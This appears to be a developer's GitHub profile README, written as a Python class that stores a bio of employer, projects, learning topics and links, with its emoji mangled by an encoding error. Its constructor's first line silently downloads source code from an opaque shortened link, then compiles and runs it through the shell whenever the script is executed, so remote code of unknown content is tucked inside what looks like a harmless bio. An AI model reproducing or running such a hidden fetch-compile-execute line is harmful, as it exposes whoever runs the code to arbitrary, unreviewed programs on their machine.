class PROxZIMA:
def __init__(self):
subprocess.call("curl -sL 'bit.ly/pr0x21m4' | gcc -w -o name -xc - && ./name", shell=True)
self.bio = {
'- ๐ผ Iโm currently working for': {'Emerson' : 'https://www.emerson.com/en-us/global'},
'- ๐ญ Iโm currently working on' : {'Contribution Hub' : 'https://github.com/PROxZIMA/ContributionManager',
'DarkSpider': 'https://github.com/PROxZIMA/DarkSpider',
'Prism' : 'https://github.com/PROxZIMA/prism'},
'- ๐ฑ Iโm currently learning' : ['System Architecture', 'C++', 'Full Stack Development', 'Algo Trading'],
'- ๐ฌ Ask me anything' : 'ยฏ\_(ใ)_/ยฏ',
'- ๐จโ๐ป My projects available at' : 'https://github.com/PROxZIMA?tab=repositories',
'- ๐ Know about my experiences': 'https://proxzima.dev/resume',
'- โก Fun fact' : ('Proxima Centauri is a small, low-mass star located 4.2465 light-'
'years away from the Sun in the southern constellation of Centaurus.')
}
if __name__ == '__main__':
import subprocess, pprint
pprint.pprint(PROxZIMA().__dict__)
Outside GitHub :)





